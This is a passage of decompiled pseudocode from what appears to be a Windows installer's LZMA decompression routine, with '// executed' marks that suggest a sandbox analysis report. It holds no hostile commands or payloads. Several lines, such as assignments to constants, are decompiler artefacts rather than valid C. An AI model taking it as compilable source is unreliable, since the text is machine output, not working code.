                      							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                      							 *(_t644 - 0x54) = _t643;
                      							_t569 =  *_t643;
                      							_t635 = _t569 & 0x0000ffff;
                      							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                      							if( *(_t644 - 0xc) >= _t607) {
                      								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                      								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                      								_t628 = _t627 + 1;
                      								 *_t643 = _t569 - (_t569 >> 5);
                      								 *(_t644 - 0x50) = _t628;
                      							} else {
                      								 *(_t644 - 0x10) = _t607;
                      								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                      								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                      							}
                      							if( *(_t644 - 0x10) >= 0x1000000) {
                      								L148:
                      								_t487 = _t644 - 0x48;
                      								 *_t487 =  *(_t644 - 0x48) - 1;
                      								L149:
                      								if( *(_t644 - 0x48) <= 0) {
                      									goto L155;
                      								}
                      								goto L150;
                      							} else {
                      								L154:
                      								L146:
                      								if( *(_t644 - 0x6c) == 0) {
                      									L169:
                      									 *(_t644 - 0x88) = 0x18;
                      									L170:
                      									_t579 = 0x22;
                      									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                      									_t539 = 0;
                      									L172:
                      									return _t539;
                      								}
                      								L147:
                      								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                      								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                      								_t484 = _t644 - 0x70;
                      								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                      								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                      								goto L148;
                      							}
                      							L155:
                      							_t537 =  *(_t644 - 0x7c);
                      							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                      							while(1) {
                      								L140:
                      								 *(_t644 - 0x88) = _t537;
                      								while(1) {
                      									L1:
                      									_t538 =  *(_t644 - 0x88);
                      									if(_t538 > 0x1c) {
                      										break;
                      									}
                      									L2:
                      									switch( *((intOrPtr*)(_t538 * 4 +  &M004068EF))) {
                      										case 0:
                      											L3:
                      											if( *(_t644 - 0x6c) == 0) {
                      												goto L170;
                      											}
                      											L4:
                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                      											_t538 =  *( *(_t644 - 0x70));
                      											if(_t538 > 0xe1) {
                      												goto L171;
                      											}
                      											L5:
                      											_t542 = _t538 & 0x000000ff;
                      											_push(0x2d);
                      											asm("cdq");
                      											_pop(_t581);
                      											_push(9);
                      											_pop(_t582);
                      											_t638 = _t542 / _t581;
                      											_t544 = _t542 % _t581 & 0x000000ff;
                      											asm("cdq");
                      											_t633 = _t544 % _t582 & 0x000000ff;
                      											 *(_t644 - 0x3c) = _t633;
                      											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                      											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                      											_t641 = (0x300 << _t633 + _t638) + 0x736;
                      											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                      												L10:
                      												if(_t641 == 0) {
                      													L12:
                      													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                      													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                      													goto L15;
                      												} else {
                      													goto L11;
                      												}
                      												do {
                      													L11:
                      													_t641 = _t641 - 1;
                      													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                      												} while (_t641 != 0);
                      												goto L12;
                      											}
                      											L6:
                      											if( *(_t644 - 4) != 0) {
                      												GlobalFree( *(_t644 - 4));
                      											}
                      											_t538 = GlobalAlloc(0x40, 0x600); // executed
                      											 *(_t644 - 4) = _t538;
                      											if(_t538 == 0) {
                      												goto L171;
                      											} else {
                      												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                      												goto L10;
                      											}
                      										case 1:
                      											L13:
                      											__eflags =  *(_t644 - 0x6c);
                      											if( *(_t644 - 0x6c) == 0) {
                      												L157:
                      												 *(_t644 - 0x88) = 1;
                      												goto L170;
                      											}
                      											L14:
                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                      											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                      											_t45 = _t644 - 0x48;
                      											 *_t45 =  *(_t644 - 0x48) + 1;
                      											__eflags =  *_t45;
                      											L15:
                      											if( *(_t644 - 0x48) < 4) {
                      												goto L13;
                      											}
                      											L16:
                      											_t550 =  *(_t644 - 0x40);
                      											if(_t550 ==  *(_t644 - 0x74)) {
                      												L20:
                      												 *(_t644 - 0x48) = 5;
                      												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                      												goto L23;
                      											}
                      											L17:
                      											 *(_t644 - 0x74) = _t550;
                      											if( *(_t644 - 8) != 0) {
                      												GlobalFree( *(_t644 - 8));
                      											}
                      											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                      											 *(_t644 - 8) = _t538;
                      											if(_t538 == 0) {
                      												goto L171;
                      											} else {
                      												goto L20;
                      											}
                      										case 2:
                      											L24:
                      											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                      											 *(_t644 - 0x84) = 6;
                      											 *(_t644 - 0x4c) = _t557;
                      											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                      											goto L132;
                      										case 3:
                      											L21:
                      											__eflags =  *(_t644 - 0x6c);
                      											if( *(_t644 - 0x6c) == 0) {
                      												L158:
                      												 *(_t644 - 0x88) = 3;
                      												goto L170;
                      											}
                      											L22:
                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                      											_t67 = _t644 - 0x70;
                      											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                      											__eflags =  *_t67;
                      											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                      											L23:
                      											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                      											if( *(_t644 - 0x48) != 0) {
                      												goto L21;
                      											}
                      											goto L24;
                      										case 4:
                      											L133:
                      											_t559 =  *_t642;
                      											_t626 = _t559 & 0x0000ffff;
                      											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                      											if( *(_t644 - 0xc) >= _t596) {
                      												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                      												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                      												 *(_t644 - 0x40) = 1;
                      												_t560 = _t559 - (_t559 >> 5);
                      												__eflags = _t560;
                      												 *_t642 = _t560;
                      											} else {
                      												 *(_t644 - 0x10) = _t596;
                      												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                      												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                      											}
                      											if( *(_t644 - 0x10) >= 0x1000000) {
                      												goto L139;
                      											} else {
                      												goto L137;
                      											}
                      										case 5:
                      											L137:
                      											if( *(_t644 - 0x6c) == 0) {
                      												L168:
                      												 *(_t644 - 0x88) = 5;
                      												goto L170;
                      											}
                      											L138:
                      											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                      											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                      											L139:
                      											_t537 =  *(_t644 - 0x84);
                      											L140:
                      											 *(_t644 - 0x88) = _t537;
                      											goto L1;
                      										case 6:
                      											L25:
                      											__edx = 0;
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												L36:
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x34) = 1;
                      												 *(__ebp - 0x84) = 7;
                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                      												goto L132;
                      											}
                      											L26:
                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                      											__esi =  *(__ebp - 0x60);
                      											__cl = 8;
                      											__cl = 8 -  *(__ebp - 0x3c);
                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                      											__ecx =  *(__ebp - 0x3c);
                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                      											__ecx =  *(__ebp - 4);
                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                      											__eflags =  *(__ebp - 0x38) - 4;
                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      											if( *(__ebp - 0x38) >= 4) {
                      												__eflags =  *(__ebp - 0x38) - 0xa;
                      												if( *(__ebp - 0x38) >= 0xa) {
                      													_t98 = __ebp - 0x38;
                      													 *_t98 =  *(__ebp - 0x38) - 6;
                      													__eflags =  *_t98;
                      												} else {
                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                      												}
                      											} else {
                      												 *(__ebp - 0x38) = 0;
                      											}
                      											__eflags =  *(__ebp - 0x34) - __edx;
                      											if( *(__ebp - 0x34) == __edx) {
                      												L35:
                      												__ebx = 0;
                      												__ebx = 1;
                      												goto L61;
                      											} else {
                      												L32:
                      												__eax =  *(__ebp - 0x14);
                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      												__eflags = __eax -  *(__ebp - 0x74);
                      												if(__eax >=  *(__ebp - 0x74)) {
                      													__eax = __eax +  *(__ebp - 0x74);
                      													__eflags = __eax;
                      												}
                      												__ecx =  *(__ebp - 8);
                      												__ebx = 0;
                      												__ebx = 1;
                      												__al =  *((intOrPtr*)(__eax + __ecx));
                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                      												goto L41;
                      											}
                      										case 7:
                      											L66:
                      											__eflags =  *(__ebp - 0x40) - 1;
                      											if( *(__ebp - 0x40) != 1) {
                      												L68:
                      												__eax =  *(__ebp - 0x24);
                      												 *(__ebp - 0x80) = 0x16;
                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      												__eax =  *(__ebp - 0x28);
                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      												__eax =  *(__ebp - 0x2c);
                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      												__eax = 0;
                      												__eflags =  *(__ebp - 0x38) - 7;
                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      												__al = __al & 0x000000fd;
                      												__eax = (__eflags >= 0) - 1 + 0xa;
                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                      												__eax =  *(__ebp - 4);
                      												__eax =  *(__ebp - 4) + 0x664;
                      												__eflags = __eax;
                      												 *(__ebp - 0x58) = __eax;
                      												goto L69;
                      											}
                      											L67:
                      											__eax =  *(__ebp - 4);
                      											__ecx =  *(__ebp - 0x38);
                      											 *(__ebp - 0x84) = 8;
                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                      											goto L132;
                      										case 8:
                      											L70:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x84) = 0xa;
                      												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                      											} else {
                      												__eax =  *(__ebp - 0x38);
                      												__ecx =  *(__ebp - 4);
                      												__eax =  *(__ebp - 0x38) + 0xf;
                      												 *(__ebp - 0x84) = 9;
                      												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                      												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                      											}
                      											goto L132;
                      										case 9:
                      											L73:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												goto L90;
                      											}
                      											L74:
                      											__eflags =  *(__ebp - 0x60);
                      											if( *(__ebp - 0x60) == 0) {
                      												goto L171;
                      											}
                      											L75:
                      											__eax = 0;
                      											__eflags =  *(__ebp - 0x38) - 7;
                      											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                      											__eflags = _t259;
                      											0 | _t259 = _t259 + _t259 + 9;
                      											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                      											goto L76;
                      										case 0xa:
                      											L82:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												L84:
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x84) = 0xb;
                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                      												goto L132;
                      											}
                      											L83:
                      											__eax =  *(__ebp - 0x28);
                      											goto L89;
                      										case 0xb:
                      											L85:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__ecx =  *(__ebp - 0x24);
                      												__eax =  *(__ebp - 0x20);
                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      											} else {
                      												__eax =  *(__ebp - 0x24);
                      											}
                      											__ecx =  *(__ebp - 0x28);
                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      											L89:
                      											__ecx =  *(__ebp - 0x2c);
                      											 *(__ebp - 0x2c) = __eax;
                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      											L90:
                      											__eax =  *(__ebp - 4);
                      											 *(__ebp - 0x80) = 0x15;
                      											__eax =  *(__ebp - 4) + 0xa68;
                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                      											goto L69;
                      										case 0xc:
                      											L99:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												L164:
                      												 *(__ebp - 0x88) = 0xc;
                      												goto L170;
                      											}
                      											L100:
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t334 = __ebp - 0x70;
                      											 *_t334 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t334;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											__eax =  *(__ebp - 0x2c);
                      											goto L101;
                      										case 0xd:
                      											L37:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												L159:
                      												 *(__ebp - 0x88) = 0xd;
                      												goto L170;
                      											}
                      											L38:
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t122 = __ebp - 0x70;
                      											 *_t122 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t122;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											L39:
                      											__eax =  *(__ebp - 0x40);
                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                      												goto L48;
                      											}
                      											L40:
                      											__eflags = __ebx - 0x100;
                      											if(__ebx >= 0x100) {
                      												goto L54;
                      											}
                      											L41:
                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                      											__ecx =  *(__ebp - 0x58);
                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                      											 *(__ebp - 0x48) = __eax;
                      											__eax = __eax + 1;
                      											__eax = __eax << 8;
                      											__eax = __eax + __ebx;
                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      											__ax =  *__esi;
                      											 *(__ebp - 0x54) = __esi;
                      											__edx = __ax & 0x0000ffff;
                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                      											__eflags =  *(__ebp - 0xc) - __ecx;
                      											if( *(__ebp - 0xc) >= __ecx) {
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      												__cx = __ax;
                      												 *(__ebp - 0x40) = 1;
                      												__cx = __ax >> 5;
                      												__eflags = __eax;
                      												__ebx = __ebx + __ebx + 1;
                      												 *__esi = __ax;
                      											} else {
                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                      												 *(__ebp - 0x10) = __ecx;
                      												0x800 = 0x800 - __edx;
                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                      												__ebx = __ebx + __ebx;
                      												 *__esi = __cx;
                      											}
                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                      											 *(__ebp - 0x44) = __ebx;
                      											if( *(__ebp - 0x10) >= 0x1000000) {
                      												goto L39;
                      											} else {
                      												L45:
                      												goto L37;
                      											}
                      										case 0xe:
                      											L46:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												L160:
                      												 *(__ebp - 0x88) = 0xe;
                      												goto L170;
                      											}
                      											L47:
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t156 = __ebp - 0x70;
                      											 *_t156 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t156;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											while(1) {
                      												L48:
                      												__eflags = __ebx - 0x100;
                      												if(__ebx >= 0x100) {
                      													break;
                      												}
                      												L49:
                      												__eax =  *(__ebp - 0x58);
                      												__edx = __ebx + __ebx;
                      												__ecx =  *(__ebp - 0x10);
                      												__esi = __edx + __eax;
                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                      												__ax =  *__esi;
                      												 *(__ebp - 0x54) = __esi;
                      												__edi = __ax & 0x0000ffff;
                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      												__eflags =  *(__ebp - 0xc) - __ecx;
                      												if( *(__ebp - 0xc) >= __ecx) {
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      													__cx = __ax;
                      													_t170 = __edx + 1; // 0x1
                      													__ebx = _t170;
                      													__cx = __ax >> 5;
                      													__eflags = __eax;
                      													 *__esi = __ax;
                      												} else {
                      													 *(__ebp - 0x10) = __ecx;
                      													0x800 = 0x800 - __edi;
                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      													__ebx = __ebx + __ebx;
                      													 *__esi = __cx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													continue;
                      												} else {
                      													L53:
                      													goto L46;
                      												}
                      											}
                      											L54:
                      											_t173 = __ebp - 0x34;
                      											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                      											__eflags =  *_t173;
                      											goto L55;
                      										case 0xf:
                      											L58:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												L161:
                      												 *(__ebp - 0x88) = 0xf;
                      												goto L170;
                      											}
                      											L59:
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t203 = __ebp - 0x70;
                      											 *_t203 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t203;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											L60:
                      											__eflags = __ebx - 0x100;
                      											if(__ebx >= 0x100) {
                      												L55:
                      												__al =  *(__ebp - 0x44);
                      												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                      												goto L56;
                      											}
                      											L61:
                      											__eax =  *(__ebp - 0x58);
                      											__edx = __ebx + __ebx;
                      											__ecx =  *(__ebp - 0x10);
                      											__esi = __edx + __eax;
                      											__ecx =  *(__ebp - 0x10) >> 0xb;
                      											__ax =  *__esi;
                      											 *(__ebp - 0x54) = __esi;
                      											__edi = __ax & 0x0000ffff;
                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      											__eflags =  *(__ebp - 0xc) - __ecx;
                      											if( *(__ebp - 0xc) >= __ecx) {
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      												__cx = __ax;
                      												_t217 = __edx + 1; // 0x1
                      												__ebx = _t217;
                      												__cx = __ax >> 5;
                      												__eflags = __eax;
                      												 *__esi = __ax;
                      											} else {
                      												 *(__ebp - 0x10) = __ecx;
                      												0x800 = 0x800 - __edi;
                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      												__ebx = __ebx + __ebx;
                      												 *__esi = __cx;
                      											}
                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                      											 *(__ebp - 0x44) = __ebx;
                      											if( *(__ebp - 0x10) >= 0x1000000) {
                      												goto L60;
                      											} else {
                      												L65:
                      												goto L58;
                      											}
                      										case 0x10:
                      											L109:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												L165:
                      												 *(__ebp - 0x88) = 0x10;
                      												goto L170;
                      											}
                      											L110:
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t365 = __ebp - 0x70;
                      											 *_t365 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t365;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											goto L111;
                      										case 0x11:
                      											L69:
                      											__esi =  *(__ebp - 0x58);
                      											 *(__ebp - 0x84) = 0x12;
                      											goto L132;
                      										case 0x12:
                      											L128:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												L131:
                      												__eax =  *(__ebp - 0x58);
                      												 *(__ebp - 0x84) = 0x13;
                      												__esi =  *(__ebp - 0x58) + 2;
                      												L132:
                      												 *(_t644 - 0x54) = _t642;
                      												goto L133;
                      											}
                      											L129:
                      											__eax =  *(__ebp - 0x4c);
                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                      											__ecx =  *(__ebp - 0x58);
                      											__eax =  *(__ebp - 0x4c) << 4;
                      											__eflags = __eax;
                      											__eax =  *(__ebp - 0x58) + __eax + 4;
                      											goto L130;
                      										case 0x13:
                      											L141:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												L143:
                      												_t469 = __ebp - 0x58;
                      												 *_t469 =  *(__ebp - 0x58) + 0x204;
                      												__eflags =  *_t469;
                      												 *(__ebp - 0x30) = 0x10;
                      												 *(__ebp - 0x40) = 8;
                      												L144:
                      												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                      												L145:
                      												 *(_t644 - 0x50) = 1;
                      												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                      												goto L149;
                      											}
                      											L142:
                      											__eax =  *(__ebp - 0x4c);
                      											__ecx =  *(__ebp - 0x58);
                      											__eax =  *(__ebp - 0x4c) << 4;
                      											 *(__ebp - 0x30) = 8;
                      											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                      											L130:
                      											 *(__ebp - 0x58) = __eax;
                      											 *(__ebp - 0x40) = 3;
                      											goto L144;
                      										case 0x14:
                      											L156:
                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                      											__eax =  *(__ebp - 0x80);
                      											while(1) {
                      												L140:
                      												 *(_t644 - 0x88) = _t537;
                      												goto L1;
                      											}
                      										case 0x15:
                      											L91:
                      											__eax = 0;
                      											__eflags =  *(__ebp - 0x38) - 7;
                      											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      											__al = __al & 0x000000fd;
                      											__eax = (__eflags >= 0) - 1 + 0xb;
                      											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                      											goto L120;
                      										case 0x16:
                      											goto L0;
                      										case 0x17:
                      											while(1) {
                      												L145:
                      												 *(_t644 - 0x50) = 1;
                      												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                      												goto L149;
                      											}
                      										case 0x18:
                      											goto L146;
                      										case 0x19:
                      											L94:
                      											__eflags = __ebx - 4;
                      											if(__ebx < 4) {
                      												L98:
                      												 *(__ebp - 0x2c) = __ebx;
                      												L119:
                      												_t393 = __ebp - 0x2c;
                      												 *_t393 =  *(__ebp - 0x2c) + 1;
                      												__eflags =  *_t393;
                      												L120:
                      												__eax =  *(__ebp - 0x2c);
                      												__eflags = __eax;
                      												if(__eax == 0) {
                      													L166:
                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                      													goto L170;
                      												}
                      												L121:
                      												__eflags = __eax -  *(__ebp - 0x60);
                      												if(__eax >  *(__ebp - 0x60)) {
                      													goto L171;
                      												}
                      												L122:
                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                      												__eax =  *(__ebp - 0x30);
                      												_t400 = __ebp - 0x60;
                      												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                      												__eflags =  *_t400;
                      												goto L123;
                      											}
                      											L95:
                      											__ecx = __ebx;
                      											__eax = __ebx;
                      											__ecx = __ebx >> 1;
                      											__eax = __ebx & 0x00000001;
                      											__ecx = (__ebx >> 1) - 1;
                      											__al = __al | 0x00000002;
                      											__eax = (__ebx & 0x00000001) << __cl;
                      											__eflags = __ebx - 0xe;
                      											 *(__ebp - 0x2c) = __eax;
                      											if(__ebx >= 0xe) {
                      												L97:
                      												__ebx = 0;
                      												 *(__ebp - 0x48) = __ecx;
                      												L102:
                      												__eflags =  *(__ebp - 0x48);
                      												if( *(__ebp - 0x48) <= 0) {
                      													L107:
                      													__eax = __eax + __ebx;
                      													 *(__ebp - 0x40) = 4;
